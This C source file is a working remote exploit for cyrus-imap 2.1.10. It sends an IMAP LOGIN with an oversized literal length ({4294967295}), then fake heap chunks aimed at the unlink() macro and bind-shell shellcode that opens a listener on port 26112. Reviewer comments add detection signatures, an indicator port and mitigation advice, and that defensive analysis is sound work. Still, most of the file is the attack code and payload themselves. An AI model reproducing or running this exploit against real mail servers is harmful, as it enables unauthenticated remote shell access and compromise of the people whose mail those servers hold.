/* cyrus-imap exploit . gives uid cyrus */
/* tested on slack linux 8.0: cyrus-imap 2.1.10 , glibc-2.2.3 ,kernel 2.4.19 */
/* irian@antisocial.com */
/* */
/* please don't distro . i don't want this crap on any website. */
/* this is PoC state. it will get better. */

/*
 * Reviewer summary (layout restored; code tokens are unchanged).
 *
 * What the listing does: opens a TCP connection to the hard-coded address
 * 127.0.0.1 port 143 and sends an IMAP "login" command whose literal length
 * is 4294967295, followed by bytes the author labels "fake chunks" aimed at
 * the allocator's unlink() macro, a short jump-over-padding stub, and the
 * shellcode array below. The login command is the first thing sent, so no
 * valid credentials are involved. The server-side flaw itself is not shown
 * on this page; presumably the oversized literal length wraps during the
 * server's size arithmetic -- confirm against the vendor advisory.
 *
 * What a defender can take from it:
 *  - Detection: an IMAP literal length at or near the 32-bit maximum in a
 *    LOGIN command is not something a legitimate client sends; it is a
 *    usable signature for IDS rules and log review.
 *  - Post-compromise indicator: the closing message tells the operator to
 *    connect to TCP port 26112, so an unexpected listener on that port
 *    running under the cyrus uid is worth alerting on.
 *  - Scope: every address in the payload is hard-coded for the build named
 *    in the header (cyrus-imap 2.1.10, glibc-2.2.3); the author calls it
 *    PoC state. Later glibc releases added consistency checks to unlink,
 *    which is the primitive the inline notes rely on.
 *  - Mitigation: run a Cyrus IMAP release that carries the vendor fix for
 *    this issue and do not expose the service under a uid with more access
 *    than the mail store requires.
 */

/* NOTE(review): the three header names were lost when the page was
 * extracted; the directives are left exactly as found. */
#include
#include
#include

/* Machine code appended to the request. Not decoded here; the final
 * message in main() implies it leaves a listener on port 26112. */
char shellcode[]=
"\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\x89\xe1\xb0\x66\x52\x50\xcd\x80\x43"
"\x66\x53\x89\xe1\x6a\x10\x51\x50\x89\xe1\x52\x50\xb0\x66\xcd\x80\x89\xe1\xb3\x04"
"\xb0\x66\xcd\x80\x43\xb0\x66\xcd\x80\x89\xd9\x93\xb0\x3f\xcd\x80\x49\x79\xf9\x52"
"\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\xb0\x0b\xcd\x80";

/* File-scope connection state shared by openconn() and main(). */
struct sockaddr_in sck;
struct hostent *hp;
long inet;
int sock;
/* Shadowed by openconn()'s parameter and not used anywhere else in the
 * visible code. */
char *target[128];

/*
 * Connect the global `sock` to target:port over TCP.
 *
 * target is tried as a dotted-quad first and then as a host name.
 * Returns 1 on success and 0 on failure, after printing a diagnostic.
 */
int openconn(char *target,int port){
    sock = socket (PF_INET, SOCK_STREAM, 0);
    /* NOTE(review): socket() reports failure with -1, which this test
     * does not catch. */
    if (!sock) { perror ("socket()"); return 0 ; }
    inet = inet_addr (target);
    if (inet == -1) {
        /* Not a numeric address: fall back to a resolver lookup and copy
         * the first 4 address bytes. */
        if (hp = gethostbyname (target)) memcpy (&inet, hp->h_addr, 4);
        else inet = -1;
        if (inet == -1) { fprintf (stderr, "can't resolve %s \n", target); return 0 ; }
    }
    sck.sin_family = PF_INET;
    sck.sin_port = htons (port);
    sck.sin_addr.s_addr = inet;
    if (connect (sock, (struct sockaddr *) &sck, sizeof (sck)) < 0) { perror ("connect() "); return 0; }
    return 1 ;
}

/*
 * Builds the request in a 512-byte stack buffer, connects to the local
 * IMAP port, waits for a key press, sends the request, and prints up to
 * 511 bytes of whatever the server answers. argc/argv are unused; the
 * target is fixed to 127.0.0.1. Declared without a return type
 * (implicit int, pre-C99 style).
 */
main(int argc,char *argv []){
    int port=143;
    char sploit[512];
    /* 4294967295 is 2^32 - 1, the largest 32-bit unsigned value (the
     * author's note read "2^32"). This literal-length field is the part
     * a network signature should key on. */
    char instr[]="x login {4294967295}\r\n";
    char readbuf[512];
    memset(sploit,0,sizeof(sploit));
    memset(readbuf,0,sizeof(readbuf));
    /* strcpy/strcat are unbounded; the pieces are fixed-size constants
     * assembled into the 512-byte buffer. */
    strcpy(sploit,instr);
    /* Author's label: "fake chunks". Values are addresses and size words
     * specific to the tested build. */
    strcat(sploit,"\x04\xf4\x11\x08\x04\xf4\x11\x08");
    strcat(sploit,"\xf0\xff\xff\xff\xfc\xff\xff\xff");
    strcat(sploit,"\x04\xf5\x11\x08\x04\xf5\x11\x08");
    strcat(sploit,"\xf0\xff\xff\xff\xfc\xff\xff\xff");
    /* Author's label: "feed it to unlink() macro"; the first dword is
     * annotated "retloc-12" and the second "shellcode addy". */
    strcat(sploit,"\x50\xb9\x10\x08\x48\xf6\x11\x08");
    strcat(sploit,"\xeb\x0c\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90");
    strcat(sploit,shellcode);
    /* NOTE(review): strlen() yields size_t but is printed with %d. */
    fprintf(stderr,"%d bytes\n",strlen(sploit));
    if (!openconn("127.0.0.1",port)) exit(-1);
    fprintf(stderr,"connected. press a key to send the stuff...\n");
    getchar();
    write(sock,sploit,strlen(sploit));
    /* Reads at most 511 bytes so the byte zeroed by memset() above keeps
     * readbuf terminated for the %s below. Return values of write() and
     * read() are not checked. */
    read(sock,readbuf,511);
    fprintf(stderr,"%s",readbuf);
    close(sock);
    /* The port named here is the host-side indicator to monitor for. */
    fprintf(stderr,"exploit done. now connect to port 26112\n");
}